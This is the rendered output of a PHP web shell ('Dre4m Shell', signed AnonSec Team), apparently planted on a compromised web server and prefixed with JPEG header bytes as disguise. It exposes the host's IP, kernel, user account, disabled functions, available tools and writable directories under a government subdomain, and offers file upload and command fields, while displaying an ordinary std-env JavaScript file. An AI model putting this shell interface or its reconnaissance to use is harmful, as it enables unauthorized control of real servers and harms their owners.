ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.136.22.192
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/funds.upgrade.nicn.gov.ng/funds-upgraded/node_modules/std-env/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/funds.upgrade.nicn.gov.ng/funds-upgraded/node_modules/std-env/index.js
// Gather initial information
var isCI = false
var debug = false
var tty = false
var nodeENV = 'development'
var browser = typeof window !== 'undefined'
var platform = ''
var minimal = false

// Boolean helper
function toBoolean(val) {
  return (!val || val === 'false') ? false : true
}

// Process dependent
if (typeof process !== 'undefined') {
  // Platform
  if (process.platform) {
    platform = String(process.platform)
  }

  // TTY
  if (process.stdout) {
    tty = toBoolean(process.stdout.isTTY)
  }

  // Is CI
  isCI = Boolean(require('ci-info').isCI)

  // Env dependent
  if (process.env) {
    // NODE_ENV
    if (process.env.NODE_ENV) {
      nodeENV = process.env.NODE_ENV
    }

    // DEBUG
    debug = toBoolean(process.env.DEBUG)

    // MINIMAL
    minimal = toBoolean(process.env.MINIMAL)
  }
}

// Construct env object
var env = {
  browser: browser,

  test: nodeENV === 'test',
  dev: nodeENV === 'development' || nodeENV === 'dev',
  production: nodeENV === 'production',
  debug: debug,

  ci: isCI,
  tty: tty,

  minimal: undefined,
  minimalCLI: undefined,

  windows: /^win/i.test(platform),
  darwin: /^darwin/i.test(platform),
  linux: /^linux/i.test(platform),
}

// Compute minimal
env.minimal = minimal || env.ci || env.test || !env.tty
env.minimalCLI = env.minimal

// Export env
module.exports = Object.freeze(env)

Anon7 - 2022
AnonSec Team